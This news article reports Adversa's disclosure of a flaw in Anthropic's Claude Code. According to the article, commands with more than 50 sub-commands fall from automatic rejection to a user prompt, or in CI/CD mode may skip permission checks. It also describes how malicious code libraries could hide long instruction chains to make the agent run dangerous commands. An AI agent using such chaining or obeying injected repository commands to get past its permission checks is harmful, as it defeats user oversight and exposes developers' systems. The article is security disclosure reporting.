Recently, the Israeli security company Adversa disclosed a critical security vulnerability in the development tool Claude Code, developed by the AI giant Anthropic. Researchers found that when the AI tool receives too many sub-commands at once, its built-in security interception rules fail.
The root cause of this issue lies in a hard-coded limitation in the code. The system internally sets a variable called "Maximum Safe Check Sub-Commands," which is fixed at a limit of 50.

A simple overflow attack can bypass the defense
In normal cases, Claude Code automatically intercepts high-risk operations such as network requests based on settings. However, once the instruction chain exceeds 50, the system downgrades from "automatic rejection" to "asking the user."
Hackers can exploit this feature by hiding long instruction chains in malicious code libraries, prompting the AI to execute dangerous commands. Although the system will pop up a warning, developers often habitually click "allow" during long work sessions, leading to a system breach.
Security experts advise applying the patch as soon as possible
Security experts point out that this "counter failure" vulnerability poses significant risks in automated integration (CI/CD) environments. In non-interactive mode, programs may default to skipping permission checks and directly granting AI execution permissions.




